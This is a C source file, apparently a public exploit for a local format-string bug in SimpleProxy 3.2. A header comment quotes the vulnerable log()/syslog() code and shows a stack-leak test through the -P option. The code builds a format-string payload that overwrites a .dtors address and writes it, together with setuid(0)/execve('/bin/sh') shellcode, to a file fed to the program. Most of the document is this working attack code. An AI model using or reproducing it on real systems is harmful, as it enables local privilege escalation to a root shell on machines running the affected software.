/*
\ SimpleProxy 3.2 local format string exploit
-/   by Darkeagle
\
-/ syslog() function in simpleproxy.c
*
*++++++++++++++++++++++++++++++++++++++++
 static void log(int type, char *format, ...)
 {
 ...
 #if HAVE_SYSLOG
     syslog(type,buffer);
 ...
 }

static struct lst_record *load_pop3_list(const char *popfile)
{
 ...
 if(*str=='\0') continue;
        log(LOG_INFO,"Adding '%s' to POP3 users list",str);
 ...
}
*++++++++++++++++++++++++++++++++++++++++
*

Also exists other vulnerable calls of log() function, including remote 
call
One more local exists in -P parameter:

[darkeagle@localhost simpleproxy-3.2]$ ./simpleproxy -L 3337 -R 
localhost:110 -d -v -p1 -f sample.cfg -P AAAA%8$\x
[darkeagle@localhost simpleproxy-3.2]$ tail -2 /var/log/syslog
Aug 27 00:14:05 localhost simpleproxy[5755]: Can't open POP3 file: 
AAAA4141203a
Aug 27 00:14:05 localhost simpleproxy[5756]: Error binding socket.
[darkeagle@localhost simpleproxy-3.2]$

very easy to exploit.

to sploit simpleproxy put in -P parameter 'popa3d.txt' value.
bug was corrected in latest version (3.4).
enough.
\
-/
\
-/
\
-/
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// We must begun !!!

#define doit( b0, b1, b2, b3, addr )  { \
             b0 = (addr >> 24) & 0xff; \
             b1 = (addr >> 16) & 0xff; \
             b2 = (addr >>  8) & 0xff; \
             b3 = (addr      ) & 0xff; \
}

char
shellcode[]=
        "\x31\xc0"
        "\x31\xdb"
        "\x31\xc9"
        "\xb0\x46"
        "\xcd\x80"
        "\x31\xc0"
        "\x50"
        "\x68\x2f\x2f\x73\x68"
        "\x68\x2f\x62\x69\x6e"
        "\x89\xe3"
        "\x8d\x54\x24\x08"
        "\x50"
        "\x53"
        "\x8d\x0c\x24"
        "\xb0\x0b"
        "\xcd\x80"
        "\x31\xc0"
        "\xb0\x01"
        "\xcd\x80";

char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int 
base, long figure )
{
  char * buf;
  unsigned char b0, b1, b2, b3;
  int start = 256;

  doit( b0, b1, b2, b3, retaddr );
  buf = (char *)malloc(999);
  memset( buf, 0, 999 );

 b3 -= figure;
 b2 -= figure;
 b1 -= figure;
 b0 -= figure;

 snprintf( buf, 999,
           "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
             b3 - (sizeof( size_t ) * 4) + start - base, offset,
             b2 - b3 + start, offset + 1,
             b1 - b2 + start, offset + 2,
             b0 - b1 + start, offset + 3 );

  return buf;
}

int
main( int argc, char * argv[] )
{
  char * fmt;
  char endian[555];
  unsigned long locaddr, retaddr;
  unsigned int offset, base;
  unsigned char b0, b1, b2, b3;
  FILE *file;

  memset( endian, 0, 555 );

  file = fopen("popa3d.txt", "w+");

  locaddr = 0x804ce20; // dtorz addrz :=)
  retaddr = 0xbfffec54; // shellcode addr
  offset  = 5;
  locaddr += 0x4; // dtorz+0x4

  doit( b0, b1, b2, b3, locaddr );

  base = 4;

  snprintf( endian, sizeof(endian),
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c",
             b3, b2, b1, b0,
             b3 + 1, b2, b1, b0,
             b3 + 2, b2, b1, b0,
             b3 + 3, b2, b1, b0 );

 fmt = evil_builder( retaddr, offset, base, 0x4 );
    
 memset(fmt+strlen(fmt), 0x42, 48);
 strcat(fmt, shellcode);
 strcat(endian, fmt);
 fprintf(file, "%s", endian);
 return 0;
}

/* EoF */